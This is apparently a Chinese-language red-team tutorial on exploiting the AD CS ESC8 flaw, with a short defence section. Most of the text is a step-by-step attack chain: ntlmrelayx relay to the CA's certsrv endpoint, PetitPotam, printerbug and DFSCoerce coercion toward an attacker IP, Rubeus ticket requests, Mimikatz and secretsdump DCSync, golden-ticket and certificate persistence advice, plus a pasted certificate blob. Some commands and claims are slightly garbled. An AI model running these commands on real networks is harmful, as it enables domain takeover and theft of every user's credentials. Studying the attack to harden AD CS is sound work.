1. ADCS-ESC8漏洞概述ADCS-ESC8是Active Directory证书服务(AD CS)中的一个高危漏洞它允许攻击者通过NTLM中继攻击获取域控制器证书。这个漏洞的核心在于ADCS默认配置中的Web证书注册页面仅使用HTTP协议且支持NTLM认证但未启用任何中继攻击防护措施。我在实际渗透测试中发现当企业环境中存在以下条件时这个漏洞就具备了可利用性启用了Web注册功能的证书颁发机构(CA)通常可通过http://CA服务器/certsrv/访问Web端点支持NTLM认证且未强制启用HTTPS或扩展保护(EPA)CA上存在允许客户端认证或域计算机注册的证书模板如默认的Machine或DomainController模板这个漏洞之所以危险是因为它可以将普通的NTLM认证中继直接升级为域控接管。我曾在一次红队评估中从初始立足点到完全控制域环境整个过程只用了不到15分钟其中关键就是利用了ESC8漏洞。2. 漏洞利用环境准备2.1 实验环境搭建为了复现这个漏洞我们需要搭建一个标准的AD CS实验环境。以下是典型的环境配置# 域控服务器 (Windows Server 2019) 主机名: DC01 IP: 192.168.1.10 角色: 域控制器 证书服务 # 证书服务器 (Windows Server 2019) IP: 192.168.1.20 角色: 企业根CA Web注册服务 # 攻击机 (Kali Linux) IP: 192.168.1.100 工具: Impacket, PetitPotam, Rubeus在实际测试中我发现Windows Server 2016/2019默认安装ADCS时就会存在这个漏洞。安装ADCS角色时务必勾选证书颁发机构Web注册功能这是漏洞利用的关键组件。2.2 工具准备攻击需要以下工具链Impacket用于NTLM中继(ntlmrelayx.py)PetitPotam强制域控发起认证RubeusKerberos票据操作Certipy证书操作工具可选安装命令示例git clone https://github.com/SecureAuthCorp/impacket.git cd impacket pip install .3. 漏洞利用详细步骤3.1 NTLM中继监听设置首先在攻击机上启动ntlmrelayx监听目标指向CA的Web注册接口python3 ntlmrelayx.py -t http://192.168.1.20/certsrv/certfnsh.asp \ --adcs --template DomainController -smb2support关键参数说明-t: 指定中继目标URL--adcs: 启用ADCS攻击模式--template: 指定要请求的证书模板DomainController最有效-smb2support: 启用SMB2支持我在测试中发现如果环境中有多个可用模板选择DomainController模板成功率最高因为它可以直接用于域控身份模拟。3.2 强制域控认证使用PetitPotam工具强制域控向攻击者发起认证python3 PetitPotam.py 192.168.1.100 192.168.1.10这个步骤的原理是利用MS-EFSRPC协议诱使域控系统服务(以SYSTEM权限运行)向攻击者指定的服务器发起认证请求。实测中即使是最新的Windows Server 2022也会受到此技术影响。3.3 获取域控证书当ntlmrelayx成功中继认证后会输出类似以下信息[*] Authenticating against http://192.168.1.20/certsrv/certfnsh.asp as MYDOMAIN/DC01$ SUCCEED [*] Base64 certificate of MYDOMAIN/DC01$: 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 /ptt这个Base64编码的证书就是我们的战利品将其保存为dc.pfx文件。这里有个小技巧如果证书中包含私钥可以直接用于后续操作如果没有可能需要额外步骤提取私钥。3.4 请求Kerberos票据在已控制的域内主机上使用Rubeus工具请求TGTRubeus.exe asktgt /user:DC01$ /certificate:dc.pfx /dc:192.168.1.10 /ptt参数解释/user: 指定要模拟的计算机账户(域控的机器账户)/certificate: 指定之前获取的证书文件/dc: 指定域控制器/ptt: 将票据注入当前会话执行成功后可以使用klist命令验证票据是否已缓存。在我的测试中这一步有时会遇到KRB-ERROR (62): KDC_ERR_CLIENT_NOT_TRUSTED错误通常是因为Kerberos加密类型不匹配需要在组策略中启用所有加密类型。3.5 执行DCSync攻击有了域控的TGT后就可以使用Mimikatz执行DCSync攻击获取域内所有用户的哈希mimikatz.exe lsadump::dcsync /domain:mydomain.com /all /csv exit或者使用Impacket的secretsdumppython3 secretsdump.py mydomain/DC01\$192.168.1.10 -hashes :ntlmhash -just-dc在实际攻击中我建议优先获取krbtgt账户的哈希因为可以用来创建黄金票据实现持久化访问。4. 攻击链分析与防御建议4.1 攻击流程总结整个攻击链可以概括为通过PetitPotam强制域控向攻击者发起NTLM认证使用ntlmrelayx将认证中继到ADCS的Web注册接口获取域控计算机账户的证书使用证书请求域控的Kerberos票据利用票据执行DCSync获取域内所有用户哈希这个攻击之所以有效是因为ADCS的Web接口默认配置存在三个问题使用HTTP而非HTTPS支持NTLM认证未启用通道绑定(EPA)保护4.2 防御措施基于实战经验我推荐以下防御方案1. 禁用NTLM认证# 在IIS中禁用NTLM认证 Get-WebConfigurationProperty -Filter /system.webServer/security/authentication/windowsAuthentication -Name enabled -PSPath IIS:\Sites\Default\Web\CertSrv | Set-WebConfigurationProperty -Value $false2. 启用HTTPS和EPA# 启用扩展保护 Set-WebConfigurationProperty -Filter /system.webServer/security/authentication/windowsAuthentication -Name extendedProtection.tokenChecking -PSPath IIS:\ -Value Require Set-WebConfigurationProperty -Filter /system.webServer/security/authentication/windowsAuthentication -Name extendedProtection.flags -PSPath IIS:\ -Value Allow3. 限制证书模板权限审查所有证书模板的ACL移除Authenticated Users的Enroll权限仅为必要用户/组授予注册权限4. 网络层面防护限制域控到CA服务器的445端口访问部署网络访问控制(NAC)防止未授权设备接入在一次企业安全评估中我们发现即使启用了HTTPS如果未配置EPA攻击仍然可能成功。因此必须同时实施多项防御措施才能有效缓解此漏洞。5. 高级利用技巧5.1 跨域攻击场景在复杂的多域环境中如果存在双向信任关系攻击者可以中继一个域的域控认证到另一个域的ADCS服务。我曾在一个拥有父子域信任关系的环境中通过中继子域域控的认证到父域的CA服务器成功获取了父域域控的证书。5.2 证书持久化获取的域控证书不仅可以用于DCSync还可以配置为长期持久化手段# 将证书添加到域控的机器账户 CertUtil.exe -f -user -p Password123 -importpfx dc.pfx这样即使更改了域控密码攻击者仍能使用证书进行认证。这种持久化方法比黄金票据更难检测因为不涉及KRBTGT账户的哈希修改。5.3 替代PetitPotam的技术如果PetitPotam被防护措施拦截可以考虑其他强制认证技术打印机漏洞(MS-RPRN)python3 printerbug.py domain/user:passwordtarget.dc attacker.ipDFSCoercepython3 dfscoerce.py -d domain -u user -p password -t target.dc -l attacker.ip这些替代技术在最新版本的Windows上可能受限但在较老系统上仍然有效。